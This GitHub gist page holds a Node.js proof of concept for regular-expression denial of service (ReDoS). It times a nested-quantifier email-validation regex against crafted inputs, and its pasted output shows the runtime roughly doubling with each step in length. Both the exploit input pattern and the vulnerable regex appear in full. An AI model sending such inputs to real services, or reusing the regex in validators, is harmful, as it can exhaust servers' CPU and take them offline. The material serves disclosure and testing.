Skip to content

Instantly share code, notes, and snippets.

@evilpacket
Created October 25, 2015 04:56
Show Gist options
  • Select an option

  • Save evilpacket/6eeca8b06dc2f5c45549 to your computer and use it in GitHub Desktop.

Select an option

Save evilpacket/6eeca8b06dc2f5c45549 to your computer and use it in GitHub Desktop.
Shitty ReDoS POC
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
r = /^([a-z0-9_\.\-\+])+\@(([a-z0-9\-])+\.)+([a-z0-9]{2,4})+$/
for (i=1;i<=10000000;i=i+1) {
console.log("COUNT: " + i);
var str = "t@" + "7." + genstr(i, 't') + "{" ;
console.log("LENGTH: " + str.length);
var start = process.hrtime();
console.log(r.test(str));
var end = process.hrtime(start);
console.log(end);
}
// Result
COUNT: 1
LENGTH: 7
false
[ 0, 803688 ]
COUNT: 3
LENGTH: 9
false
[ 0, 141871 ]
COUNT: 5
LENGTH: 11
false
[ 0, 32618 ]
COUNT: 7
LENGTH: 13
false
[ 0, 25082 ]
COUNT: 9
LENGTH: 15
false
[ 0, 28394 ]
COUNT: 11
LENGTH: 17
false
[ 0, 25384 ]
COUNT: 13
LENGTH: 19
false
[ 0, 26710 ]
COUNT: 15
LENGTH: 21
false
[ 0, 29386 ]
COUNT: 17
LENGTH: 23
false
[ 0, 40314 ]
COUNT: 19
LENGTH: 25
false
[ 0, 54110 ]
COUNT: 21
LENGTH: 27
false
[ 0, 78012 ]
COUNT: 23
LENGTH: 29
false
[ 0, 149074 ]
COUNT: 25
LENGTH: 31
false
[ 0, 250270 ]
COUNT: 27
LENGTH: 33
false
[ 0, 400358 ]
COUNT: 29
LENGTH: 35
false
[ 0, 894745 ]
COUNT: 31
LENGTH: 37
false
[ 0, 1805014 ]
COUNT: 33
LENGTH: 39
false
[ 0, 4054987 ]
COUNT: 35
LENGTH: 41
false
[ 0, 9596726 ]
COUNT: 37
LENGTH: 43
false
[ 0, 18652895 ]
COUNT: 39
LENGTH: 45
false
[ 0, 39708166 ]
COUNT: 41
LENGTH: 47
false
[ 0, 83203249 ]
COUNT: 43
LENGTH: 49
false
[ 0, 166302383 ]
COUNT: 45
LENGTH: 51
false
[ 0, 370137148 ]
COUNT: 47
LENGTH: 53
false
[ 0, 773351122 ]
COUNT: 49
LENGTH: 55
false
[ 1, 689719124 ]
COUNT: 51
LENGTH: 57
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment